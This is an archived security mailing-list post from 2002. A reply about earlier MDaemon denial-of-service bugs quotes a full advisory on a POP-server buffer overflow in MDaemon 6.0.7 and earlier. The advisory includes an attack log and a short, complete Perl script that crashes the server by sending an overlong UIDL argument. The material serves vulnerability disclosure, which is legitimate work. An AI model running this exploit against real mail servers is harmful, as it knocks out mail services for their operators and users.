There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be specific). Check bid 1366, http://online.securityfocus.com/bid/1366/ The website still offers 6.0.7 (vulnerable) version for download, So apparently no workaround exists except for shutting it down until the patch or newer version is available. Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- D4rkGr3y <grey_1999at_private> wrote: >###################################################### >#Product: MDaemon SMTP/POP/IMAP server # >#Authors: Alt-N Technologies Ltd [www.mdaemon.com] # >#Vulnerable versions: v.6.0.7 and bellow # >#Vulnerability: buffer overflow # >#Bug&exploit by D4rkGr3y [www.dhgroup.org] # >###################################################### > >#Overview#--------------------------------------------------------------# >From MDaemon's help file: >"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services >commonplace on UNIX hosts and the Internet to Windows based servers >and microcomputers. MDaemon is designed to manage the email needs of >any number of individual users and comes complete with a powerful set >of integrated tools for managing mail accounts and message formats. >MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete >with LDAP support, an integrated browser-based email client, content >filtering, spam blockers, extensive security features, and more." > >#Problem#----------------------------------------------------------------# >Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by >sending long arguments (32b and above) with DELE or UIDL commands. >To do this u must have at least mail-account on vulnerable host. >After geting long request from client, all MDaemon's Services will be >closed (smtp, imap, pop, (?)worldclient). >Here the log of attack on local MDaemon POP-server: > >+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210 >271036.AA3656130MD0012at_private> >USER D4rkGr3y >+OK D4rkGr3y... Recipient ok >PASS cool-pass >+OK D4rkGr3yat_private's mailbox has 1 total messages (18356 octets). >UIDL 11111111111111111111111111111111 > >Connection to host lost... > >#Exploit#----------------------------------------------------------------# > >#!/usr/bin/perl >#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y >use IO::Socket; >$host = "[vuln_host]"; >$login = "[login]"; >$pass = "[pass]"; >$port = "110"; >$data = "1"; >$num = "32"; >$buf .= $data x $num; >$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) >or die "Couldn't connect: @!\n"; >print $socket "USER $login\n"; >print $socket "PASS $user\n"; >print $socket "UIDL $buf\n"; >close($socket); > >#EOF > >Best regards www.dhgroup.org > D4rkGr3y icq 540981 _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get youat_private w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 14:45:22 PST